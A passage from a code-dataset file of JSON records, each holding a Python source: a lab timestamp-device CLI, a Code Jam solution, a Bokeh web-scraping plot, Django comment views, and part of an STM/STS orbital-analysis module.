parser = configargparse.ArgumentParser(\n default_config_files=[\"./inst_efficiency.py.default.conf\"],\n description=\"Continuous printing of timestamp statistics\"\n )\n\n # Parser-level arguments\n # ConfigArgParse does not support multiple configuration files for same argument\n # Workaround by adding additional argument with similar argument name to supply\n # any secondary configuration, i.e. 
\"-c\" and \"-C\" both supplies configuration\n parser.add_argument(\n \"--config\", \"-c\", is_config_file_arg=True,\n help=\"Configuration file\")\n parser.add_argument(\n \"--save\", is_write_out_config_file_arg=True,\n help=\"Save configuration as file, and immediately exits program\")\n\n # Script-level arguments\n parser.add_argument(\n \"--averaging\", \"-a\", action=\"store_true\",\n help=\"Change to averaging singles mode\")\n parser.add_argument(\n \"--histogram\", \"-H\", action=\"store_true\",\n help=\"Enable histogram in pairs mode\")\n parser.add_argument(\n \"--no-histogram\", action=\"store_true\",\n help=\"Disable histogram in pairs mode. Overrides other histogram options.\")\n parser.add_argument(\n \"--logging\", \"-l\", nargs=\"?\", action=\"store\", const=\"unspecified\",\n help=\"Log stuff\")\n parser.add_argument(\n \"--verbose\", \"-v\", action=\"count\", default=0,\n help=\"Specify debug verbosity\")\n parser.add_argument(\n \"--quiet\", \"-q\", action=\"store_true\",\n help=\"Suppress errors, does not block logging\")\n parser.add_argument(\n \"script\", choices=PROGRAMS,\n help=\"Script to run\")\n\n # Device-level argument\n parser.add_argument(\n \"--device_path\", \"-U\", default=\"/dev/ioboards/usbtmst0\",\n help=\"Path to timestamp device\")\n parser.add_argument(\n \"--readevents_path\", \"-S\",\n default=\"/home/qitlab/programs/drivers/usbtmst4/apps/readevents7\",\n help=\"Path to readevents binary\")\n parser.add_argument(\n \"--outfile_path\", \"-O\", default=\"/tmp/quick_timestamp\",\n help=\"Path to temporary file for timestamp storage\")\n parser.add_argument(\n \"--threshvolt\", \"-t\", type=float, default=\"-0.4\",\n help=\"Pulse trigger level for each detector channel, comma-delimited\")\n parser.add_argument(\n \"--fast\", \"-f\", action=\"store_true\",\n help=\"Enable fast event readout mode, i.e. 32-bit wide events. 
Only for TDC2.\")\n\n    # Data processing arguments\n    parser.add_argument(\n        \"--bin_width\", \"--width\", \"-W\", type=float, default=1,\n        help=\"Size of time bin, in nanoseconds\")\n    parser.add_argument(\n        \"--bins\", \"-B\", type=int, default=500,\n        help=\"Number of coincidence bins, in units of 'bin_width'\")\n    parser.add_argument(\n        \"--peak\", \"--window-center\", \"-M\", type=int, default=-250,\n        help=\"Absolute bin location of coincidence window, in units of 'bin_width'\")\n    parser.add_argument(\n        \"--window_left_offset\", \"--left\", \"-L\", type=int, default=0,\n        help=\"Left boundary of coincidence window relative to window middle\")\n    parser.add_argument(\n        \"--window_right_offset\", \"--right\", \"-R\", type=int, default=0,\n        help=\"Right boundary of coincidence window relative to window middle\")\n    parser.add_argument(\n        \"--integration_time\", \"--time\", \"-T\", type=float, default=1.0,\n        help=\"Integration time for timestamp, in seconds\")\n    parser.add_argument(\n        \"--averaging_time\", \"--atime\", type=float, default=0.0,\n        help=\"Auxiliary long-term integration time, in seconds\")\n    parser.add_argument(\n        \"--darkcount_ch1\", \"--ch1\", \"-1\", type=float, default=0.0,\n        help=\"Dark count level for detector channel 1, in counts/second\")\n    parser.add_argument(\n        \"--darkcount_ch2\", \"--ch2\", \"-2\", type=float, default=0.0,\n        help=\"Dark count level for detector channel 2, in counts/second\")\n    parser.add_argument(\n        \"--darkcount_ch3\", \"--ch3\", \"-3\", type=float, default=0.0,\n        help=\"Dark count level for detector channel 3, in counts/second\")\n    parser.add_argument(\n        \"--darkcount_ch4\", \"--ch4\", \"-4\", type=float, default=0.0,\n        help=\"Dark count level for detector channel 4, in counts/second\")\n    parser.add_argument(\n        \"--channel_start\", \"--start\", type=int, default=1,\n        help=\"Reference timestamp channel for calculating time delay offset\")\n    parser.add_argument(\n        \"--channel_stop\", \"--stop\", type=int, default=4,\n        help=\"Target timestamp channel for calculating time delay offset\")\n    parser.add_argument(\n        \"--color\", action=\"store_true\",\n        help=\"Add preset color highlighting to text in stdout\")\n    # Reenable python-black linter\n    # fmt: on\n\n    # Do script only if arguments supplied\n    # otherwise run as a normal script (for interactive mode)\n    if len(sys.argv) > 1:\n        args = parser.parse_args()\n\n        # Set program logging verbosity\n        levels = [\n            logging.CRITICAL,\n            logging.WARNING,\n            logging.INFO,\n            logging.DEBUG,\n        ]\n        logging.basicConfig(\n            level=levels[min(args.verbose, 3)],\n            format=\"{asctime} {levelname}: {message}\",\n            style=\"{\",\n        )\n        logging.debug(\"Arguments: %s\", args)\n\n        # Request for comments\n        path_logfile = None\n        if args.logging:\n\n            # No arguments supplied, to query user manually\n            if args.logging == \"unspecified\":\n                path_logfile = _request_filecomment()\n\n            # Comment for logfile supplied, use that\n            else:\n                path_logfile = _append_datetime_logfile(args.logging)\n\n        # Silence all errors/tracebacks\n        if args.quiet:\n            sys.excepthook = lambda etype, e, tb: print()\n\n        # Disable color if not explicitly enabled\n        if not args.color or not COLORAMA_IMPORTED:\n            style = lambda text, *args, **kwargs: text  # noqa\n\n        # Initialize timestamp\n        timestamp = TimestampTDC2(\n            device_path=args.device_path,\n            readevents_path=args.readevents_path,\n            outfile_path=args.outfile_path,\n        )\n        timestamp.threshold = args.threshvolt\n        timestamp.fast = args.fast\n\n        # Collect required arguments\n        params = dict([(k, getattr(args, k, None)) for k in 
ARGUMENTS])\n params[\"logfile\"] = path_logfile\n params[\"histogram\"] = args.histogram\n params[\"no_histogram\"] = args.no_histogram\n params[\"averaging\"] = args.averaging\n params[\"timestamp\"] = timestamp\n\n # Call script\n PROGRAMS[args.script](params)\n","repo_name":"s-fifteen-instruments/pyS15","sub_path":"S15lib/apps/inst_efficiency.py","file_name":"inst_efficiency.py","file_ext":"py","file_size_in_byte":28593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23506824891","text":"from math import sqrt\r\ndef toDecimal(n, b):\r\n result = 0\r\n i = 0\r\n while n!=0:\r\n result += (n%10)*(b**i)\r\n n //= 10\r\n i += 1\r\n return result\r\n\r\ndef getDevisor(n):\r\n for i in range(2, int(sqrt(n))):\r\n if n%i == 0:\r\n return i\r\n\r\ndef binaryAdd2(n):\r\n n = str(n)\r\n for i in range(len(n)-2, -1, -1):\r\n if n[i] == '0':\r\n break\r\n return int(n[:i]+'1'+'0'*(len(n) - i-2)+'1')\r\n\r\ndef main():\r\n n = int(input())\r\n N = []\r\n J = []\r\n for i in range(n):\r\n line = input().split(' ')\r\n N.append(int(line[0]))\r\n J.append(int(line[1]))\r\n for i in range(n):\r\n print(\"Case #1:\")\r\n currNum = 10**(N[i]-1)+1\r\n for j in range( J[i] ):\r\n while(True):\r\n devisors = []\r\n for k in range(2, 11):\r\n d = getDevisor(toDecimal(currNum, k))\r\n if d:\r\n devisors.append(d)\r\n else:\r\n break\r\n if len(devisors) == 9:\r\n result = str(currNum)\r\n for k in devisors:\r\n result += ' '+str(k)\r\n print(result)\r\n currNum = binaryAdd2(currNum)\r\n break\r\n else:\r\n currNum = binaryAdd2(currNum)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_179/2263.py","file_name":"2263.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6500225256","text":"from bokeh.plotting import figure, show\nfrom bs4 import BeautifulSoup as BS\nimport requests\n\nurl = 'https://www.daxi-hro.tycg.gov.tw/home.jsp?id=25&parentpath=0,21,22'\ncontent = requests.get(url)\nparse = BS(content.text, 'html.parser')\n\nyear = []\nperson = []\ndata1 = parse.select(\"table[summary^='歷年戶數統計列表排版用']\")[0]\nrows = data1.find_all(\"tr\")\nfor row in rows:\n cols = row.find_all(\"td\")\n if len(cols) > 0:\n year.append(cols[0].text[:-1])\n person.append(cols[1].text)\n\np = figure(width = 800, height = 400, title = \"桃園市大溪區歷年戶數\")\np.title.text_font_size = \"24pt\"\np.xaxis.axis_label = \"年份\"\np.yaxis.axis_label = \"戶數\"\np.line(year, person, line_width = 2)\nshow(p)\n# Question: 調整x軸的數值寬度","repo_name":"Sapphire0912/Programming","sub_path":"Python/Practice/Beginner Course/ch07/bokeh_people.py","file_name":"bokeh_people.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71109444676","text":"from django.shortcuts import render, redirect, get_object_or_404\n\n# Create your views here.\nfrom django.urls import reverse\nfrom django.views.generic import CreateView\nfrom django.views.generic import ListView\n\nfrom blog.models import Post\nfrom commets.forms import CommentModleForm\nfrom commets.models import Comment\n\n\ndef post_comment(request,pk):\n post = get_object_or_404(Post,pk=pk)\n form = CommentModleForm()\n if request.method == 'POST':\n form = CommentModleForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.post_id = pk\n 
comment.save()\n # return redirect(reverse('blog:post_detail',kwargs={'pk':pk}))\n else:\n context = {\n 'post':post,\n 'form':form,\n }\n return render(request,'blog/detail.html',context)\n # return render(request,'blog/detail.html',{'form':form})\n return redirect(post)\n\n\n#修改为通用类试图\nclass PostComment(CreateView):\n model = Comment\n template_name = 'blog/detail.html'\n fields = ['name','email','url','context']\n def get_success_url(self):\n return reverse('blog:post_detail',kwargs={'pk':self.kwargs['pk']})\n\n def get_context_data(self, **kwargs):\n context = super(PostComment, self).get_context_data(**kwargs)\n post = get_object_or_404(Post,pk=self.kwargs['pk'])\n context.update({\n 'post':post,\n 'comment_list':post.comment_set.all()\n })\n # return super(PostComment, self).get_context_data()\n return context\n def form_valid(self, form):\n form.instance.post_id = self.kwargs['pk']\n return super().form_valid(form)\n def form_invalid(self, form):\n post = get_object_or_404(Post,self.kwargs['pk'])\n return render(self.request,'blog/detail.html',{\n 'post':post,\n 'comment_list':post.comment_set.all()\n })\n","repo_name":"fshFSH1387/mblog","sub_path":"commets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33345846908","text":"\"\"\"\nTools to perform STM/STS analysis on orbitals evaluated on grid\n\"\"\" \n\nimport os\nimport numpy as np\nimport scipy\nimport scipy.io\nimport scipy.special\nimport time\nimport copy\nimport sys\n\nimport re\nimport io\nimport ase\nimport ase.io\n\nfrom .cp2k_grid_orbitals import Cp2kGridOrbitals\n\nang_2_bohr = 1.0/0.52917721067\nhart_2_ev = 27.21138602\n\nclass STM:\n \"\"\"\n Class to perform STM and STS analysis on gridded orbitals\n \"\"\"\n\n def __init__(self, mpi_comm, cp2k_grid_orb, p_tip_ratios):\n\n self.cgo = cp2k_grid_orb\n self.nspin = self.cgo.nspin\n self.mpi_rank = self.cgo.mpi_rank\n self.mpi_size = self.cgo.mpi_size\n self.cell_n = self.cgo.eval_cell_n\n self.dv = self.cgo.dv\n self.origin = self.cgo.origin\n self.global_morb_energies = self.cgo.global_morb_energies\n\n self.mpi_comm = mpi_comm\n\n self.p_tip_ratios = p_tip_ratios\n # add a check if ptip needs to be calculated, as it can use a lot of memory\n self.ptip_enabled = True\n if all(r == 0.0 for r in p_tip_ratios):\n self.ptip_enabled = False\n\n self.global_morb_energies_by_rank = None\n\n self.z_arr = np.arange(0.0, self.cell_n[2]*self.dv[2], self.dv[2]) + self.origin[2]\n # to angstrom and WRT to topmost atom\n self.z_arr /= ang_2_bohr\n self.z_arr -= np.max(self.cgo.ase_atoms.positions[:, 2])\n\n # TODO: Would be nice to have a datatype containing orbitals and all of their grid info\n # and also to access planes above atoms at different heights...\n self.local_orbitals = None # orbitals defined in local space for this mpi_rank\n self.local_cell_n = None\n self.local_cell = None\n self.local_origin = None\n\n # p-tip contribution of the orbitals defined in local space for this mpi_rank\n self.local_orbital_ptip = None\n \n # Dictionary containing all the STM/STS/ORB output\n self.series_output = {}\n \"\"\"\n self.series_output = {\n 's0 orb': {\n 'general_info': {\n 'energies': [-0.4, -0.3, -0.1, ...],\n 'orb_indexes': [255, 256, 257, ...],\n 'HOMO': 257,\n },\n 'series_info': [\n {'type': 'ch-orb', 'height': 3.0},\n {'type': 'ch-sts', 'height': 3.0, 'fwhm': 0.1},\n ...,\n ],\n 'series_data': [\n [n_orb, nx, ny],\n [n_orb, nx, ny],\n 
...,\n ]\n }\n 's1 orb': {\n ...\n }\n }\n \"\"\"\n\n\n def x_ind_per_rank(self, rank):\n # which x indexes to allocate to rank\n base_ix_per_rank = int(np.floor(self.cell_n[0] / self.mpi_size))\n extra_ix = self.cell_n[0] - base_ix_per_rank*self.mpi_size\n\n if rank < extra_ix:\n x_ind_start = rank*(base_ix_per_rank + 1)\n x_ind_end = (rank+1)*(base_ix_per_rank + 1)\n else:\n x_ind_start = rank*(base_ix_per_rank) + extra_ix\n x_ind_end = (rank+1)*(base_ix_per_rank) + extra_ix\n\n return x_ind_start, x_ind_end\n\n def divide_by_space(self):\n\n self.local_orbitals = []\n self.local_orbital_ptip = []\n\n x_ind_start, x_ind_end = self.x_ind_per_rank(self.mpi_rank)\n self.local_cell_n = np.array([x_ind_end - x_ind_start, self.cell_n[1], self.cell_n[2]])\n num_spatial_points = (x_ind_end - x_ind_start) * self.cell_n[1] * self.cell_n[2]\n\n self.local_origin = self.origin\n self.local_origin[0] += x_ind_start*self.dv[0]\n self.local_cell = self.local_cell_n*self.dv\n\n for ispin in range(self.nspin):\n\n orbitals_per_rank = np.array([len(gme) for gme in self.global_morb_energies_by_rank[ispin]])\n total_orb = sum(orbitals_per_rank)\n\n for rank in range(self.mpi_size):\n\n # which indexes to send?\n ix_start, ix_end = self.x_ind_per_rank(rank)\n \n if self.mpi_rank == rank:\n recvbuf = np.empty(sum(orbitals_per_rank)*num_spatial_points, dtype=self.cgo.dtype)\n #print(\"R%d expecting counts: \" % (self.mpi_rank) + str(orbitals_per_rank*num_spatial_points))\n #sys.stdout.flush()\n else:\n recvbuf = None\n\n sendbuf = self.cgo.morb_grids[ispin][:, ix_start:ix_end, :, :].ravel()\n #print(\"R%d -> %d sending %d\" %(self.mpi_rank, rank, len(sendbuf)))\n #sys.stdout.flush()\n\n # Send the orbitals\n self.mpi_comm.Gatherv(sendbuf=sendbuf,\n recvbuf=[recvbuf, orbitals_per_rank*num_spatial_points], root=rank)\n\n if self.mpi_rank == rank:\n self.local_orbitals.append(recvbuf.reshape(total_orb, self.local_cell_n[0], self.local_cell_n[1], self.local_cell_n[2]))\n \n if self.ptip_enabled:\n ### Calculate and divide also the p-tip contribution,\n ### as derivatives are hard to account for after dividing the orbitals in space\n p_tip_contrib = (np.gradient(self.cgo.morb_grids[ispin], axis=1)/self.dv[0])**2\n p_tip_contrib += (np.gradient(self.cgo.morb_grids[ispin], axis=2)/self.dv[1])**2\n\n for rank in range(self.mpi_size):\n ix_start, ix_end = self.x_ind_per_rank(rank)\n if self.mpi_rank == rank:\n recvbuf = np.empty(sum(orbitals_per_rank)*num_spatial_points, dtype=self.cgo.dtype)\n else:\n recvbuf = None\n sendbuf = p_tip_contrib[:, ix_start:ix_end, :, :].ravel()\n self.mpi_comm.Gatherv(sendbuf=sendbuf,\n recvbuf=[recvbuf, orbitals_per_rank*num_spatial_points], root=rank)\n if self.mpi_rank == rank:\n self.local_orbital_ptip.append(recvbuf.reshape(total_orb, self.local_cell_n[0], self.local_cell_n[1], self.local_cell_n[2]))\n\n\n def gather_global_energies(self):\n self.global_morb_energies_by_rank = []\n self.global_morb_energies = []\n for ispin in range(self.nspin):\n morb_en_gather = self.mpi_comm.allgather(self.cgo.morb_energies[ispin])\n self.global_morb_energies_by_rank.append(morb_en_gather)\n self.global_morb_energies.append(np.hstack(morb_en_gather))\n\n def gather_orbitals_from_mpi(self, to_rank, from_rank):\n self.current_orbitals = []\n for ispin in range(self.nspin):\n\n if self.mpi_rank == from_rank:\n self.mpi_comm.Send(self.cgo.morb_grids[ispin].ravel(), to_rank)\n if self.mpi_rank == to_rank:\n num_rcv_orb = len(self.global_morb_energies[ispin][from_rank])\n cell_n = 
self.cgo.eval_cell_n\n rcv_buf = np.empty(num_rcv_orb*cell_n[0]*cell_n[1]*cell_n[2], dtype=self.cgo.dtype)\n self.mpi_comm.Recv(rcv_buf, from_rank)\n self.current_orbitals.append(rcv_buf.reshape(num_rcv_orb, cell_n[0], cell_n[1], cell_n[2]))\n\n ### -----------------------------------------\n ### Making data series\n ### -----------------------------------------\n\n def _get_isosurf_indexes(self, data, value, interp=True):\n rev_data = data[:, :, ::-1]\n \n # Add a zero-layer at start to make sure we surpass it\n zero_layer = np.zeros((data.shape[0], data.shape[1], 1))\n rev_data = np.concatenate((zero_layer, rev_data), axis=2)\n \n nz = rev_data.shape[2]\n\n # Find first index that surpasses the isovalue\n indexes = np.argmax(rev_data > value, axis=2)\n # If an index is 0, no values in array are bigger than the specified\n num_surpasses = (indexes == 0).sum()\n if num_surpasses != 0:\n print(\"Warning: The isovalue %.3e was not reached for %d pixels\" % (value, num_surpasses))\n # Set surpasses as the bottom surface\n indexes[indexes == 0] = nz - 1\n \n if interp:\n indexes_float = indexes.astype(float)\n for ix in range(np.shape(rev_data)[0]):\n for iy in range(np.shape(rev_data)[1]):\n ind = indexes[ix, iy]\n if ind == nz - 1:\n continue\n val_g = rev_data[ix, iy, ind]\n val_s = rev_data[ix, iy, ind - 1]\n indexes_float[ix, iy] = ind - (val_g-value)/(val_g-val_s)\n return nz - indexes_float - 1\n return nz - indexes.astype(float) - 1\n\n def _index_with_interpolation(self, index_arr, array):\n i = index_arr.astype(int)\n remain = index_arr-i\n iplus = np.clip(i+1, a_min=None, a_max=len(array)-1)\n return array[iplus]*remain +(1-remain)*array[i]\n\n def _take_2d_from_3d(self, val_arr,z_indices):\n # Get number of columns and rows in values array\n nx, ny, nz = val_arr.shape\n # Get linear indices \n idx = z_indices + nz*np.arange(ny) + nz*ny*np.arange(nx)[:,None]\n return val_arr.flatten()[idx]\n\n def _index_with_interpolation_3d(self, index_arr, array_3d):\n i = index_arr.astype(int)\n remain = index_arr-i\n iplus = np.clip(i+1, a_min=None, a_max=array_3d.shape[2]-1)\n return self._take_2d_from_3d(array_3d, iplus)*remain +(1-remain)*self._take_2d_from_3d(array_3d, i)\n\n def gaussian(self, x, fwhm):\n sigma = fwhm/2.3548\n return np.exp(-x**2/(2*sigma**2))/(sigma*np.sqrt(2*np.pi))\n\n def gaussian_area(self, a, b, x0, fwhm):\n sigma = fwhm/2.3548\n integral = 0.5*(scipy.special.erf((b-x0)/(np.sqrt(2)*sigma)) - scipy.special.erf((a-x0)/(np.sqrt(2)*sigma)))\n return np.abs(integral)\n\n def local_data_plane_above_atoms(self, local_data, height):\n \"\"\"\n Returns the 2d plane above topmost atom in z direction\n height in [angstrom]\n \"\"\"\n topmost_atom_z = np.max(self.cgo.ase_atoms.positions[:, 2]) # Angstrom\n plane_z = (height + topmost_atom_z) * ang_2_bohr\n plane_z_wrt_orig = plane_z - self.local_origin[2]\n\n plane_index = int(np.round(plane_z_wrt_orig/self.local_cell[2]*self.local_cell_n[2]))\n return local_data[:, :, plane_index]\n\n def s_p_type_signal(self, i_spin, i_mo, p_tip_ratio):\n if p_tip_ratio == 0.0:\n return self.local_orbitals[i_spin][i_mo]**2\n else:\n return (1.0 - p_tip_ratio) * self.local_orbitals[i_spin][i_mo]**2 + p_tip_ratio * self.local_orbital_ptip[i_spin][i_mo]\n\n def build_stm_series(self, e_arr, fwhms, heights, isovalues, p_tip_ratio=0.0):\n\n #print(\"Create series: \" + str(e_arr))\n\n rev_output = False\n if np.abs(e_arr[-1]) < np.abs(e_arr[0]):\n e_arr = e_arr[::-1]\n rev_output = True\n\n cc_ldos = np.zeros((len(fwhms), len(isovalues), 
self.local_cell_n[0], self.local_cell_n[1], len(e_arr)), dtype=self.cgo.dtype)\n cc_map = np.zeros((len(fwhms), len(isovalues), self.local_cell_n[0], self.local_cell_n[1], len(e_arr)), dtype=self.cgo.dtype)\n ch_ldos = np.zeros((len(fwhms), len(heights), self.local_cell_n[0], self.local_cell_n[1], len(e_arr)), dtype=self.cgo.dtype)\n ch_map = np.zeros((len(fwhms), len(heights), self.local_cell_n[0], self.local_cell_n[1], len(e_arr)), dtype=self.cgo.dtype)\n\n def index_energy(inp):\n if not inp.any():\n return None\n return np.argmax(inp)\n\n for i_fwhm, fwhm in enumerate(fwhms):\n \n cur_charge_dens = np.zeros(self.local_cell_n)\n\n last_e = 0.0\n\n for i_e, e in enumerate(e_arr):\n # ---------------------\n # Contributing orbitals in the energy range since last energy value\n close_indexes = []\n for ispin in range(self.nspin):\n e1 = np.min([last_e, e])\n e2 = np.max([last_e, e])\n close_i1 = index_energy(self.global_morb_energies[ispin] > e1 - 2.0*fwhm)\n close_i2 = index_energy(self.global_morb_energies[ispin] > e2 + 2.0*fwhm)\n if close_i1 is None:\n close_i1 = 0\n if close_i2 is None:\n close_i2 = len(self.global_morb_energies[ispin])\n close_indexes.append(np.arange(close_i1, close_i2))\n\n # ---------------------\n # Update charge density\n for ispin in range(self.nspin):\n for i_mo in close_indexes[ispin]:\n morb_en = self.global_morb_energies[ispin][i_mo]\n broad_factor = self.gaussian_area(last_e, e, morb_en, fwhm)\n cur_charge_dens += broad_factor*self.s_p_type_signal(ispin, i_mo, p_tip_ratio)\n\n # ---------------------\n # find surfaces corresponding to isovalues\n for i_iso, isoval in enumerate(isovalues):\n \n i_isosurf = self._get_isosurf_indexes(cur_charge_dens, isoval, True)\n cc_map[i_fwhm, i_iso, :, :, i_e] = self._index_with_interpolation(i_isosurf, self.z_arr)\n \n for ispin in range(self.nspin):\n for i_mo in close_indexes[ispin]:\n morb_en = self.global_morb_energies[ispin][i_mo]\n morb_on_surf = self._index_with_interpolation_3d(\n i_isosurf,\n self.s_p_type_signal(ispin, i_mo, p_tip_ratio)\n )\n cc_ldos[i_fwhm, i_iso, :, :, i_e] += self.gaussian(e - morb_en, fwhm) * morb_on_surf\n \n # ---------------------\n # find constant height images\n for i_h, height in enumerate(heights):\n \n ch_map[i_fwhm, i_h, :, :, i_e] = self.local_data_plane_above_atoms(cur_charge_dens, height)\n\n for ispin in range(self.nspin):\n for i_mo in close_indexes[ispin]:\n morb_en = self.global_morb_energies[ispin][i_mo]\n morb_on_plane = self.local_data_plane_above_atoms(\n self.s_p_type_signal(ispin, i_mo, p_tip_ratio),\n height\n )\n ch_ldos[i_fwhm, i_h, :, :, i_e] += self.gaussian(e - morb_en, fwhm) * morb_on_plane\n last_e = e\n\n if rev_output:\n return cc_ldos[:, :, :, :, ::-1], cc_map[:, :, :, :, ::-1], ch_ldos[:, :, :, :, ::-1], ch_map[:, :, :, :, ::-1]\n else:\n return cc_ldos, cc_map, ch_ldos, ch_map\n\n \n def calculate_stm_maps(self, fwhms, isovalues, heights, energies, series_name='stm', i_series_offset=0):\n \"\"\"\n STM maps for specified energies, isovalues, heights, fwhms.\n \"\"\"\n\n e_arr = np.sort(energies)\n emin = e_arr[0]\n emax = e_arr[-1]\n\n if series_name not in self.series_output:\n number_of_series = (len(heights) + len(isovalues)) * len(fwhms) * 2 * len(self.p_tip_ratios)\n self.series_output[series_name] = {\n 'general_info': {'energies': e_arr},\n 'series_info': [],\n 'series_data': np.zeros((number_of_series, len(e_arr), self.local_cell_n[0], self.local_cell_n[1]), dtype=self.cgo.dtype)\n }\n \n i_series_counter = i_series_offset\n\n for p_tip_ratio in 
self.p_tip_ratios:\n\n if emin * emax >= 0.0:\n cc_sts, cc_stm, ch_sts, ch_stm = self.build_stm_series(e_arr, fwhms, heights, isovalues, p_tip_ratio)\n else:\n e_arr_neg = e_arr[e_arr <= 0.0]\n e_arr_pos = e_arr[e_arr > 0.0]\n\n cc_sts_n, cc_stm_n, ch_sts_n, ch_stm_n = self.build_stm_series(e_arr_neg, fwhms, heights, isovalues, p_tip_ratio)\n cc_sts_p, cc_stm_p, ch_sts_p, ch_stm_p = self.build_stm_series(e_arr_pos, fwhms, heights, isovalues, p_tip_ratio)\n\n cc_sts = np.concatenate((cc_sts_n, cc_sts_p), axis=4)\n cc_stm = np.concatenate((cc_stm_n, cc_stm_p), axis=4)\n ch_sts = np.concatenate((ch_sts_n, ch_sts_p), axis=4)\n ch_stm = np.concatenate((ch_stm_n, ch_stm_p), axis=4)\n\n # Move energy axis to position 2 (Other axes remain in their original order)\n cc_sts = np.moveaxis(cc_sts, 4, 2)\n cc_stm = np.moveaxis(cc_stm, 4, 2)\n ch_sts = np.moveaxis(ch_sts, 4, 2)\n ch_stm = np.moveaxis(ch_stm, 4, 2)\n\n ### ------------------------------------\n ### Save the data to self.series_output\n\n\n for i_fwhm, fwhm in enumerate(fwhms):\n\n for i_h, h in enumerate(heights):\n self.series_output[series_name]['series_info'].append({\n 'type': 'const-height sts',\n 'height': h,\n 'fwhm': fwhm,\n 'p_tip_ratio': p_tip_ratio,\n })\n self.series_output[series_name]['series_data'][i_series_counter, :, :, :] = ch_sts[i_fwhm, i_h, :, :, :]\n i_series_counter += 1\n\n for i_isov, isov in enumerate(isovalues):\n self.series_output[series_name]['series_info'].append({\n 'type': 'const-isovalue sts',\n 'isovalue': isov,\n 'fwhm': fwhm,\n 'p_tip_ratio': p_tip_ratio,\n })\n self.series_output[series_name]['series_data'][i_series_counter, :, :, :] = cc_sts[i_fwhm, i_isov, :, :, :]\n i_series_counter += 1\n\n for i_h, h in enumerate(heights):\n self.series_output[series_name]['series_info'].append({\n 'type': 'const-height stm',\n 'height': h,\n 'fwhm': fwhm,\n 'p_tip_ratio': p_tip_ratio,\n })\n self.series_output[series_name]['series_data'][i_series_counter, :, :, :] = ch_stm[i_fwhm, i_h, :, :, :]\n i_series_counter += 1\n\n for i_isov, isov in enumerate(isovalues):\n self.series_output[series_name]['series_info'].append({\n 'type': 'const-isovalue stm',\n 'isovalue': isov,\n 'fwhm': fwhm,\n 'p_tip_ratio': p_tip_ratio,\n })\n self.series_output[series_name]['series_data'][i_series_counter, :, :, :] = cc_stm[i_fwhm, i_isov, :, :, :]\n i_series_counter += 1\n \n\n def collect_local_grid(self, local_arr, global_shape, to_rank = 0):\n \"\"\"\n local_arr needs to have x as first axis\n \"\"\"\n\n size_except_x = np.prod(global_shape[1:])\n\n nx_per_rank = np.array([ self.x_ind_per_rank(r)[1] - self.x_ind_per_rank(r)[0] for r in range(self.mpi_size) ])\n\n if self.mpi_rank == to_rank:\n recvbuf = np.empty(sum(nx_per_rank)*size_except_x, dtype=self.cgo.dtype)\n #print(\"R%d expecting counts: \" % (self.mpi_rank) + str(nx_per_rank*size_except_x))\n else:\n recvbuf = None\n \n sendbuf = local_arr.ravel()\n\n self.mpi_comm.Gatherv(sendbuf=sendbuf, recvbuf=[recvbuf, nx_per_rank*size_except_x], root=to_rank)\n if self.mpi_rank == to_rank:\n recvbuf = recvbuf.reshape(global_shape)\n return recvbuf\n\n def collect_series_maps(self):\n\n nx = self.cell_n[0]\n ny = self.cell_n[1]\n\n for label, ser in self.series_output.items():\n\n ne = len(ser['general_info']['energies'])\n n_ser = len(ser['series_info'])\n\n ser['series_data'] = self.collect_local_grid(ser['series_data'].swapaxes(0, 2), np.array([nx, ne, n_ser, ny]))\n\n if self.mpi_rank == 0:\n ser['series_data'] = ser['series_data'].swapaxes(2, 0)\n\n def 
apply_zero_threshold(self, data_array, zero_thresh):\n # apply it to every energy slice independently\n for i_series in range(data_array.shape[0]):\n for i_e in range(data_array.shape[1]):\n sli = data_array[i_series, i_e, :, :]\n slice_absmax = np.max(np.abs(sli))\n sli[np.abs(sli) < slice_absmax*zero_thresh] = 0.0\n\n def collect_and_save_stm_maps(self, path = \"./stm.npz\"):\n\n self.collect_series_maps()\n \n if self.mpi_rank == 0:\n\n save_data = {\n 'stm_general_info': self.series_output['stm']['general_info'],\n 'stm_series_info': self.series_output['stm']['series_info'],\n 'stm_series_data': self.series_output['stm']['series_data'].astype(np.float32),\n }\n\n ### ----------------\n ### Reduce filesize further by zero threshold\n zero_thresh = 1e-3\n self.apply_zero_threshold(save_data['stm_series_data'], zero_thresh)\n ### ----------------\n\n # additionally add info\n save_data['stm_general_info']['x_arr'] = np.arange(0.0, self.cell_n[0]*self.dv[0] + self.dv[0]/2, self.dv[0]) + self.origin[0]\n save_data['stm_general_info']['y_arr'] = np.arange(0.0, self.cell_n[1]*self.dv[1] + self.dv[1]/2, self.dv[1]) + self.origin[1]\n np.savez_compressed(path, **save_data)\n\n # Reset, otherwise can cause problems (more versatile to NOT reset, though)\n self.series_output = {}\n\n ### -----------------------------------------\n ### Orbital analysis and export\n ### -----------------------------------------\n\n def create_orb_series(self, orb_indexes, height_list=[], isoval_list=[], fwhm_list=[]):\n \"\"\"\n orb_indexes - orbital indexes w.r.t. to \"ref_index_glob\" for both spin channels\n \"\"\"\n orb_indexes_wrt_data_start = []\n n_orb = len(orb_indexes)\n\n ens_list = []\n\n # Setup the series' dictionaries\n for i_spin in range(self.nspin):\n label = 's%d_orb' % i_spin\n self.series_output[label] = {}\n\n orb_indexes_wrt_data_start.append(list(np.array(orb_indexes) + self.cgo.cwf.ref_index_glob))\n\n # Orbital / energy info\n for i_spin in range(self.nspin):\n label = 's%d_orb' % i_spin\n\n ens_list.append(self.global_morb_energies[i_spin][orb_indexes_wrt_data_start[i_spin]])\n physical_index_list = self.cgo.cwf.global_morb_indexes[i_spin][orb_indexes_wrt_data_start[i_spin]]\n\n self.series_output[label]['general_info'] = {\n 'energies': ens_list[-1],\n 'orb_indexes': physical_index_list,\n 'homo': physical_index_list[self.cgo.i_homo_glob[i_spin]],\n 'spin': i_spin,\n }\n self.series_output[label]['series_info'] = []\n \n number_of_series = (\n len(height_list) # just s-type 